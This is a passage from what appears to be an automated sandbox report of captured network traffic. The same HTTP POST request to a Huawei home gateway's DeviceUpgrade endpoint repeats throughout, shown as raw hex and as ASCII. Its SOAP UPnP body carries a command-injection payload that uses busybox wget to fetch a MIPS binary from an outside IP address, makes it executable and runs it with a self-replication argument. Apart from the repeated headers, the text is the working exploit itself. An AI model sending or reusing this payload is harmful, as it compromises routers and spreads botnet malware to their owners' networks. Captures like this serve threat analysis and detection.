6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 